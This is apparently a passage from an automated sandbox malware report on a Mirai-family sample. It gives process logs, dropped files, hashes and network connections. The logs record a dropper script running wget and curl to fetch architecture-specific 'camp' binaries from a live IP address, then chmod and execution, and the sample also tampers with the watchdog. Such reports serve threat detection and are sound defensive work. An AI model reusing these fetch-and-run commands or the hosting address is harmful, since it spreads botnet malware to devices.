| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/cat | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/camp.ppc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.m68k | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.x86_64 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.arm5 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.sh4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.arm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.arm5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.arm7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.ppc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.sh4 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.mips64 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.mpsl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.sparc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.m68k | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.arc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.x86_64 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.i686 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.mips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.arm7 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.mpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.arm | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.arm6 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/Chaotic | /tmp/ohshit.sh | N/A |
| File opened for modification | /tmp/camp.x86 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.i686 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.arm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/busybox | /bin/cp | N/A |
| File opened for modification | /tmp/camp.arc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.x86 | /usr/bin/curl | N/A |
Processes
/tmp/ohshit.sh
[/tmp/ohshit.sh]
/bin/cp
[cp /bin/busybox /tmp/]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.arc]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.arc]
/bin/cat
[cat camp.arc]
/bin/chmod
[chmod +x busybox camp.arc Chaotic ohshit.sh systemd-private-62296eb1a0ad45a38bb7146d93baeaea-systemd-timedated.service-WmNdZD]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.x86]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.x86]
/bin/cat
[cat camp.x86]
/bin/chmod
[chmod +x busybox camp.arc camp.x86 Chaotic ohshit.sh systemd-private-62296eb1a0ad45a38bb7146d93baeaea-systemd-timedated.service-WmNdZD]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.x86_64]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.x86_64]
/bin/cat
[cat camp.x86_64]
/bin/chmod
[chmod +x busybox camp.arc camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-62296eb1a0ad45a38bb7146d93baeaea-systemd-timedated.service-WmNdZD]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.i686]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.i686]
/bin/cat
[cat camp.i686]
/bin/chmod
[chmod +x busybox camp.arc camp.i686 camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-62296eb1a0ad45a38bb7146d93baeaea-systemd-timedated.service-WmNdZD]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.mips]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.mips]
/bin/cat
[cat camp.mips]
/bin/chmod
[chmod +x busybox camp.arc camp.i686 camp.mips camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-62296eb1a0ad45a38bb7146d93baeaea-systemd-timedated.service-WmNdZD]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.mips64]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.mips64]
/bin/cat
[cat camp.mips64]
/bin/chmod
[chmod +x busybox camp.arc camp.i686 camp.mips camp.mips64 camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-62296eb1a0ad45a38bb7146d93baeaea-systemd-timedated.service-WmNdZD]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.mpsl]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.mpsl]
/bin/cat
[cat camp.mpsl]
/bin/chmod
[chmod +x busybox camp.arc camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-62296eb1a0ad45a38bb7146d93baeaea-systemd-timedated.service-WmNdZD]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.arm]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.arm]
/bin/cat
[cat camp.arm]
/bin/chmod
[chmod +x busybox camp.arc camp.arm camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-62296eb1a0ad45a38bb7146d93baeaea-systemd-timedated.service-WmNdZD]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.arm5]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.arm5]
/bin/cat
[cat camp.arm5]
/bin/chmod
[chmod +x busybox camp.arc camp.arm camp.arm5 camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-62296eb1a0ad45a38bb7146d93baeaea-systemd-timedated.service-WmNdZD]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.arm6]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.arm6]
/bin/cat
[cat camp.arm6]
/bin/chmod
[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-62296eb1a0ad45a38bb7146d93baeaea-systemd-timedated.service-WmNdZD]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.arm7]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.arm7]
/bin/cat
[cat camp.arm7]
/bin/chmod
[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-62296eb1a0ad45a38bb7146d93baeaea-systemd-timedated.service-WmNdZD]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.ppc]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.ppc]
/bin/cat
[cat camp.ppc]
/bin/chmod
[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.mips camp.mips64 camp.mpsl camp.ppc camp.x86 camp.x86_64 Chaotic ohshit.sh]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.sparc]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.sparc]
/bin/cat
[cat camp.sparc]
/bin/chmod
[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.mips camp.mips64 camp.mpsl camp.ppc camp.sparc camp.x86 camp.x86_64 Chaotic ohshit.sh]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.m68k]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.m68k]
/bin/cat
[cat camp.m68k]
/bin/chmod
[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.m68k camp.mips camp.mips64 camp.mpsl camp.ppc camp.sparc camp.x86 camp.x86_64 Chaotic ohshit.sh]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.sh4]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.sh4]
/bin/cat
[cat camp.sh4]
/bin/chmod
[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.m68k camp.mips camp.mips64 camp.mpsl camp.ppc camp.sh4 camp.sparc camp.x86 camp.x86_64 Chaotic ohshit.sh]
/tmp/Chaotic
[./Chaotic]
Network
| Country | Destination | Domain | Proto |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:3778 | tcp | |
| US | 198.12.107.126:3778 | tcp | |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
Files
/tmp/busybox
| MD5 | a39fe8036e559ce804e26518061e59ff |
| SHA1 | 8df27f6e8a48b762d945ea2f2b87390c80acd4de |
| SHA256 | 3180df117342646dcdc4c436f95b41e15587e2238ec59064b4b06c065d56cf38 |
| SHA512 | e97756f316fceef7360e789362648529eea50eb6f7cc56cf654b3fc43ca61f0e4d9f366ed8fd59b73dd5a49615e935e9f53686d15f9a83c7fa472a70e7196d0d |
/tmp/camp.arc
| MD5 | 36a7a1e959eaf7d6896505777912ecdf |
| SHA1 | 4f9a1f8cc82036f0ffb90c6dc1c5093bca499919 |
| SHA256 | 5111947e9ff3b6280e4ba90b172bf864838492b0b48d640be41f51be427c44ca |
| SHA512 | 77acb1b88c40e0f91b4ec44216b3b49161a892f6bbca2cb09fe82be1ba7f5b469008f655b46473ba53734d2610863b98f97ac3a54475837867efc3e156bf2fb0 |
/tmp/Chaotic
| MD5 | dac9f1dcafdb77db0d0ff1be1e704b1e |
| SHA1 | e83605a050e0aaad3dba360545a00036f083eb91 |
| SHA256 | 7fd32ee1c25ade0f67fc93e797707d956ee74c36c44c93ea8e3f00a0085e938d |
| SHA512 | e2869500ed728e8a63947e541dc5c04edb9d581862715863334195d87f35c5207de8db7e23affe8113b2029ddbffd92364491e4291c53ecc4664fcc0244a0571 |
/tmp/Chaotic
| MD5 | 62e0ec59f989335be5fbf630a49da4ea |
| SHA1 | 43bdde1afd1089008539973b08e35dd66fb7451a |
| SHA256 | c3ae1058890bf151d5d464a608b68e2c377d4d31043e3883efb0d8a20685ab15 |
| SHA512 | ee8c5e36a0abc86c042630fcbd03f96459fe77cd8683498b77121c1a11befe59f72e3363989265317109f77df2d3c8633ccabc7e91581e3bdc363f29b8173b95 |
/tmp/Chaotic
| MD5 | 4c64afb0ad73da68d0e9dc8894d97f3a |
| SHA1 | 0d3f5938508079bf9dbbe13d75d7b91e21845312 |
| SHA256 | de175c508f1a56aa4fd47e0aa8103566c46508823bd8800a71e1f354fa18db2b |
| SHA512 | 7e65132191ca5f83ac7ce6b7d63a3423175d3ab893a859c1de37fd9d22f4fd4c76cfc163405ddc6c6c2910c31831a3c0a4f3b86fa68a241c40f328823050e107 |
/tmp/Chaotic
| MD5 | adfc93deaed5f946d896d185a7a3672f |
| SHA1 | 30686df1ec33ec8941a6bd5471292ec4dfdc7522 |
| SHA256 | 9ff7a99509c5186f028858692deb9b685bb196df414fad5822dec0f4efe90ccd |
| SHA512 | 94318e934aa23e1b9dfe4baa2dd1700986bea4343cf62bcac4c964876b42f70235260bc3ed4d367bf0501bfa334a5472a7307d258762cbf6d9c93b116263867f |
memory/816-1-0x00400000-0x0045af60-memory.dmp
/tmp/Chaotic
| MD5 | 69e35fed3302be73c0de271eae2690f7 |
| SHA1 | fdfb172bdcefc5f97d642c56e3771deffa0341c6 |
| SHA256 | 265c9eb70b9af05fc3e2cbeaf5a3505a76e5903b3e9286e70ba799c430f15981 |
| SHA512 | 1157694bf541b030139adfc760dacee62d39d45970d958a60177b1068320a9f3501971a7b745788f99024b757e81b4304b3ff7c1c4eeb76cd194c4f681db07f2 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-09 08:32
Reported
2024-11-09 08:34
Platform
debian9-mipsel-20240418-en
Max time kernel
138s
Max time network
145s
Command Line
Signatures
Mirai
Mirai family
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
Modifies Watchdog functionality
| Description | Indicator | Process | Target |
| File opened for modification | /dev/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/Chaotic | N/A |
Enumerates running processes
Writes file to system bin folder
| Description | Indicator | Process | Target |
| File opened for modification | /sbin/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /bin/watchdog | /tmp/Chaotic | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/327/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/432/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/76/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/8/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/17/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/154/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/702/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/703/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/5/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/6/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/18/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/22/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/24/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/361/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/705/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/2/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/9/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/111/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/149/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/169/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/358/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/14/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/708/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/36/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/68/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/74/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/81/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/681/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/788/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/10/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/82/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/120/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/381/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/667/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/674/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/842/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/23/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/78/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/376/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/16/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/19/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/75/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/670/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/841/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/15/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/37/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/84/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/13/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/77/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/331/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/697/status | /tmp/Chaotic | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/cat | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/cat | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/camp.mips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.arm5 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.arm5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.arm6 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.arm7 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.i686 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.arm7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.mips64 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.ppc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/busybox | /bin/cp | N/A |
| File opened for modification | /tmp/camp.m68k | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.sh4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.arc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.mpsl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.arm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.x86 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.x86_64 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.i686 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.mpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.arc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.x86_64 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.ppc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.sparc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.arm | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.arm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.m68k | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.sh4 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/Chaotic | /tmp/ohshit.sh | N/A |
Processes
/tmp/ohshit.sh
[/tmp/ohshit.sh]
/bin/cp
[cp /bin/busybox /tmp/]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.arc]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.arc]
/bin/cat
[cat camp.arc]
/bin/chmod
[chmod +x busybox camp.arc Chaotic ohshit.sh systemd-private-1cf8b6e8793e4fab844e6ddbaf438d0d-systemd-timedated.service-xf2Y29]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.x86]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.x86]
/bin/cat
[cat camp.x86]
/bin/chmod
[chmod +x busybox camp.arc camp.x86 Chaotic ohshit.sh systemd-private-1cf8b6e8793e4fab844e6ddbaf438d0d-systemd-timedated.service-xf2Y29]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.x86_64]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.x86_64]
/bin/cat
[cat camp.x86_64]
/bin/chmod
[chmod +x busybox camp.arc camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-1cf8b6e8793e4fab844e6ddbaf438d0d-systemd-timedated.service-xf2Y29]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.i686]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.i686]
/bin/cat
[cat camp.i686]
/bin/chmod
[chmod +x busybox camp.arc camp.i686 camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-1cf8b6e8793e4fab844e6ddbaf438d0d-systemd-timedated.service-xf2Y29]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.mips]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.mips]
/bin/cat
[cat camp.mips]
/bin/chmod
[chmod +x busybox camp.arc camp.i686 camp.mips camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-1cf8b6e8793e4fab844e6ddbaf438d0d-systemd-timedated.service-xf2Y29]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.mips64]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.mips64]
/bin/cat
[cat camp.mips64]
/bin/chmod
[chmod +x busybox camp.arc camp.i686 camp.mips camp.mips64 camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-1cf8b6e8793e4fab844e6ddbaf438d0d-systemd-timedated.service-xf2Y29]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.mpsl]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.mpsl]
/bin/cat
[cat camp.mpsl]
/bin/chmod
[chmod +x busybox camp.arc camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-1cf8b6e8793e4fab844e6ddbaf438d0d-systemd-timedated.service-xf2Y29]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.arm]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.arm]
/bin/cat
[cat camp.arm]
/bin/chmod
[chmod +x busybox camp.arc camp.arm camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic ohshit.sh]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.arm5]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.arm5]
/bin/cat
[cat camp.arm5]
/bin/chmod
[chmod +x busybox camp.arc camp.arm camp.arm5 camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic ohshit.sh]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.arm6]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.arm6]
/bin/cat
[cat camp.arm6]
/bin/chmod
[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic ohshit.sh]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.arm7]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.arm7]
/bin/cat
[cat camp.arm7]
/bin/chmod
[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic ohshit.sh]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.ppc]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.ppc]
/bin/cat
[cat camp.ppc]
/bin/chmod
[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.mips camp.mips64 camp.mpsl camp.ppc camp.x86 camp.x86_64 Chaotic ohshit.sh]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.sparc]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.sparc]
/bin/cat
[cat camp.sparc]
/bin/chmod
[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.mips camp.mips64 camp.mpsl camp.ppc camp.sparc camp.x86 camp.x86_64 Chaotic ohshit.sh]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.m68k]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.m68k]
/bin/cat
[cat camp.m68k]
/bin/chmod
[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.m68k camp.mips camp.mips64 camp.mpsl camp.ppc camp.sparc camp.x86 camp.x86_64 Chaotic ohshit.sh]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.sh4]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.sh4]
/bin/cat
[cat camp.sh4]
/bin/chmod
[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.m68k camp.mips camp.mips64 camp.mpsl camp.ppc camp.sh4 camp.sparc camp.x86 camp.x86_64 Chaotic ohshit.sh]
/tmp/Chaotic
